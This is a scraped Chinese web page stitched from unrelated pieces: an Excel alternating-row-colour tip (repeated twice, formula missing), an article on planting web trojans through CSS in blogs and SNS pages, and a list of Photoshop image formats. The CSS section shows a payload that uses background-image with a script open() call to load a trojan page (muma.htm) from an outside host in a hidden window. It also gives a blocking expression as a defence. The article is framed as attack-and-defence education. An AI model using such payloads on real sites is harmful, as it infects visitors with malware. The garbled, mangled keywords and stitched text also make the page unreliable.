每当你制作exc表格
有没想过不同行用不同颜色?
想过吧
今天我要分享的就是一个小巧的方法
不需要一行一行的换色
只需要选定一个区域
然后输入一个公式即可
下面我们开始制作
如图,打开exc表格 然后选定区域
然后点击格式->条件格式
在条件那儿选择公式,输入以下公式
这里我们随便选择一个颜色做为不同于普通exc背景色的色调
这个时候,隔行变色表格制作完成
大家还可以按照自己需求。来制作更加好看的表格。
本文来自:梧桐雨软件园原创,转载请注明出处。
每当你制作exc表格
有没想过不同行用不同颜色?
想过吧
今天我要分享的就是一个小巧的方法
不需要一行一行的换色
只需要选定一个区域
然后输入一个公式即可
下面我们开始制作
如图,打开exc表格 然后选定区域
然后点击格式->条件格式
在条件那儿选择公式,输入以下公式
这里我们随便选择一个颜色做为不同于普通exc背景色的色调
这个时候,隔行变色表格制作完成
大家还可以按照自己需求。来制作更加好看的表格。
本文来自:梧桐雨软件园原创,转载请注明出处。
用来制作网页特效的CSS代码,也可以用来挂马。 —————–写在前面
随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来。
网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱。有许多非常著名的网站都被黑客用CSS挂马入侵过。
建议大家在点击陌生链接时,要多个心眼,大网站也是可能被挂马的。大家在上网时,最好还是使用一些带网页木马拦截功能的安全辅助工具。
黑客为什么选择CSS挂马?
在Web1.0时代,使用E挂马对于黑客而言,与其说是为了更好地实现木马的隐藏,倒不如说是无可奈何的一个选择。在简单的HTML网页和缺乏交互性的网站中,黑客可以利用的手段也非常有限,即使采取了复杂的伪装,也很容易被识破,还不如E来得直接和有效。
但如今交互式的Web2.0网站越来越多,允许用户设置与修改的博客、SNS社区等纷纷出现。这些互动性非常强的社区和博客中,往往会提供丰富的功能,并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改,这促使了CSS挂马流行。
小百科:
CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。
黑客在利用CSS挂马时,往往是借着网民对某些大网站的信任,将CSS恶意代码挂到博客或者其他支持CSS的网页中,当网民在访问该网页时恶意代码就会执行。这就如同你去一家知名且证照齐全的大医院看病,你非常信任医院,但是你所看的门诊却已经被庸医外包了下来,并且打着医院的名义利用你的信任成功欺骗了你。但是当你事后去找人算账时,医院此时也往往一脸无辜。对于安全工程师而言,CSS挂马的排查是必备常识。
CSS挂马攻防实录
攻CSS挂马方式较多,但主流的方式是通过有漏洞的博客或者SNS社交网站系统,将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。
方式1:
Body
“background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式,这段恶意代码主要是通过“background-image”配合t代码让网页木马悄悄地在用户的电脑中运行。
那如何将这段CSS恶意代码挂到正常的网页中去呢?黑客可以将生成好的网页木马放到自己指定的位置,然后将该段恶意代码写入挂马网站的网页中,或者挂马网页所调用的CSS文件中。
小百科:
使用Body对象元素,主要是为了让对象不再改变整个网页文档的内容,通过Body对象的控制,可以将内容或者效果控制在指定的大小内,如同使用DIV对象那样精确地设置大小。
方式2:
Body
background-image: url(t:open(“http://www.X.com/muma.htm”,”newwindow”,”border=”1″ Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no”))
方式1的CSS挂马技术,在运行时会出现空白的页面,影响网页访问者正常的访问,因此比较容易发现。不过在方式2中的这段代码,使用了t的Open开窗,通过新开一个隐藏的窗口,在后台悄悄地运行新窗口并激活访问网页溢出木马页面,不会影响访问者观看网页内容,因此更加隐蔽。
防网络服务器被挂马,通常会出现防病毒软件告警之类的信息。由于漏洞不断更新,挂马种类时刻都在变换,通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志,发现异常信息,经常检查网站代码,使用网页木马检测系统,进行排查。
目前除了使用以前的阻断弹出窗口防范CSS挂马之外,还可以在网页中设置CSS过滤,将CSS过滤掉。不过如果你选择过滤CSS的话,首先需要留意自己的相关网页是否有CSS的内容,因此我们仍然首推用阻断方式来防范CSS。阻断代码如下所示:
emiao1:expression(this.src=”about:blank”,this.outerHTML=””);
PSD(*.PSD)
PSD格式是Adobe Photoshop软件自身的格式,这种格式可以存储Photoshop中所有的图层,通道、参考线、注解和颜色模式等信息。在保存图像时,若图像中包含有层,则一般都用Photoshop(PSD)格式保存。保存后的图像将不具有任何图层。
PSD格式在保存时会将文件压缩,以减少占用磁盘空间,但PSD格式所包含图像数据信息较多(如图层、通道、剪辑路径、参考线等),因此比其他格式的图像文件还是要大得多。由于PSD文件保留所有原图像数据信息,因而修改起来较为方便,大多数排版软件不支持PSD格式的文件,必须到图像处理完以后,再转换为其他占用空间小而且存储质量好的文件格式。
BMP(*.BMP)
BMP文件格式是一种Windows或OS2标准的位图式图像文件格式,它支持RGB、索引颜色、灰度和位图样式模式,但不支持Alpha通道。该文件格式还可以支持1~24位的格式,其中对于4~8位的图像,使用Run Length Encodlng(RLE.运行长度编码)压缩方案,这种压缩方案不会损失数据,是一种非常稳定的格式。BMP格式不支持CMYK模式的图像。
TIFF(*.TIf)
TIFF的英文全名是Tagged Image File Format(标记图像文件格式)。它是一种无损压缩格式,TIFF格式便于应用程序之间和计算机平台之间图像数据交换。因此,TIFF格式是应用非常广泛的一种图像格式,可以在许多图像软件和平台之间转换。TIFF格式支持RGB、CMYK和灰度3种颜色模式中还支持使用通道(Channels)、图层(Layers)和裁切路径(Paths)的功能,他可以将图像中裁切路径以外的部分在置入到排版软件中(如PageMaker)时变为透明。
在Photoshop中另存为Basic TIFF的文件格式会出现一对话框,从中可以选择PC机或Macintosh苹果机的格式,并且在保存时可以选择用LZW压缩保存的图像文件。 Enhanced TIFF格式不支持裁切路径,在另存的对话框中可以选择多种压缩方式,如在Compression(压缩)下拉列表中选择LZW、ZIP和JPEG的压缩方式,以减少文件所占的磁盘空间。虽然可以减少文件大小,但会增加打开文件和存储文件的时间。也可以选择OC机或Macintosh苹果机的格式。
JPEG(*.JPG)
JPEG的英文全名是Jont Picture Expert Group(联合图像专家组),它是一种有损压缩格式。此格式的图像通常用于图像预览和一些超文本文档中(HTML文档)。JPEG格式的最大特色就是文件比较小,可以进行高倍率的压缩,是目前所有格式中压缩率最高的格式之一。但是JPEG格式在压缩保存的过程中会以失量最小的方式丢掉一些肉眼不易察觉得数据。因而保存的图像与原图有所差别,没有原图的质量好,因此印刷品最好不要用此图像格式。
JPEG格式支持CMYK、RGB和灰度的颜色模式,但不支持Alpha通道。当将一个图像另存为JPEG的图像格式是,会打开JPEG Options对话框,从中可以选择图像的品质和压缩比例,通常大部分的情况下选择“最大”选择来压缩图像所产生的品质与原来图像的质量差别不大,但文件大小会减少很多。
Photoshop EPS(*.EPS)
EPS格式为压缩的PostScript格式,是为在PostScript打印机上输出图像开发的格式。其最大优点在于可以在排版软件中以低分辨率预览,而在打印时以高分辨率输出。它不支持Alpha通道,可以支持裁切路径。
EPS格式支持Photoshop所有颜色模式,可以用来存储点阵图像和相量图形,在存储点阵图像时,还可以将图像的白色像素设置为透明的效果,它在位图模式下可以支持透明。
GIF(*.GIF)
GIF格式是CompuServe提供的一种图形格式,只是保存最多256色的RGB色阶阶数,它使用LZW压缩方式将文件压缩而不会占磁盘空间,因此GIF格式广泛应用于因特网HTML网页文档中,或网络上的图片传输,但只能支持8位的图像文件。
在保存GIF格式之前,必需将图片格式转换为位图,灰阶或索引色等颜色模式,GIF格式采用两种保存格式,一种为CompuServe GIF格式,可以支持Interlace(交错的)保存格式,让图像在网络上显示时是由模糊逐渐转换为清晰的效果。另一种格式为GIF 89a Export,除了支持Ibterlace(交错的)特性外,还可以支持透明背景及动画格式,它只支持一个Alpha通道的图像信息。
PCX(*.PCX)
PCX图像格式最早是ZSOFT公司的Paintbrush图形软件所支持的图像格式。PCX格式与BMP格式一样支持1-24位的图像,并可以用RLE的压缩方式保存文件,PCX格式还可以支持RGB、索引颜色、灰度颜色、灰度和位图的颜色模式,但不支持Alpha通道。
Film Strip(*.FLM)
该格式的扩展名为 .FLM,,它是Adobe Premiere动画软件使用的格式这种格式的图像只能在Photoshop中打开,修改并保存,而不能够将其他格式的图像转换成为FLM格式的文件,而且在Photoshop中如果更改了FLM格式图像的尺寸和分辨率,则保存后就不能够重新插入到Adobe Premiere软件中了。
PICT(*.PCI)
PCI文件格式的特点是它能够对大块相同颜色的图形进行非常有效的压缩。当一个RGB颜色模式的图像保存为PICT格式的图像时,会弹出对话框,提示选择16位或是32为像素分辨率保存图像,如果选择32位则保存的图像文件中可以包含通道。PICT格式支持RGB、索引颜色、灰度和位图颜色模式,其中在RGB模式下还支持Alpha通道。
PNG(*.PNG)
PNG格式是由Netscape公司开发出来的格式,可以用于网络图像,但它不同于GIF格式图像只能保存256色,PNG格式可以保存24位的真彩色图像,并且支持透明背景和消除锯齿边缘的功能,可以在不失真的情况下压缩保存图像。但由于PNG格式不完全支持所有浏览器,所以在网页使用要比 GIF和JPEG格式使用少的多。但相信随着网络的发展和因特网传输的改善,PNG格式将是未来网页中使用的一种标准图像格式。
PNG格式文件在RGB个灰度模式下支持Alpha通道,但是索引颜色个位图模式下不支持Alpha通道。在保存PNG格式的图像时,会弹出对话框,如果在对话框中选中Interlaced(交错的)按钮,那么在使用浏览器欣赏该图片时就会以由模糊逐渐转为清晰的效果方式渐渐显示出来。
PDF(*.PDF)
PDF格式是Adobe公司开发的用于Windows、Mac OS、UNIX和DOS系统的一种电子出版软件的文档格式,适用于不同的平台。它以PostScript Leve12语言为基础,因此可以覆盖失量式图像个点阵图像,并支持超链接。
PDF文件是有Adobe Acrobat软件生成的文件格式,该格式文件可以存有多页信息,其中包含图形个文件的查找和导航功能。因此,使用该软件不需要排版或图像软件即可获得图文混排的版面。由于该格式支持超文本连接,因此是网络下载经常使用的文件。
PDF格式支持RGB、索引颜色、CMYK、灰度、位图和Lab颜色模式,并已支持通道、图层等数据信息。并且PDF格式还支持JPEG和ZIP 的压缩格式(位图颜色模式不支持ZIP压缩格式保存),保存时会出现对话框,从中可以选中压缩的方式,当选择JPEG压缩时,还可以选择不同的压缩比例来控制图像品质。若选中Save Transparency(保存透明)复选框,则可以保存图像透明的属性。
Photo CD(*.PCD)
Photo CD格式是柯达(Kodak)相片光盘的文件,以只读的方式存储在CD-ROM中。因此,该格式只能在Photoshop中打开而不能在 Photoshop中保存。打开PCD格式的文件时,会出现提示对话框,从中可以选择不同的分辨率打开图像。此外,PCD格式采用了Kodak Precision Color Management System(柯达精确颜色管理系统,缩写为KPCMS),能够有效控制颜色模式个显示器模式。
TGA(*.TGA)
TGA格式专门用于使用ruevision视频卡的系统,并且通常受MS-DOS颜色应用程序的支持。Targa格式支持24位RGB图像(8位 x3颜色通道)个32位RGB图像(8位x3颜色通道外加一个8位alpha通道)。Targa格式也支持无alpha通道的索引颜色个灰度图像。以这种格式存储RGB图像时,可选取像素深度。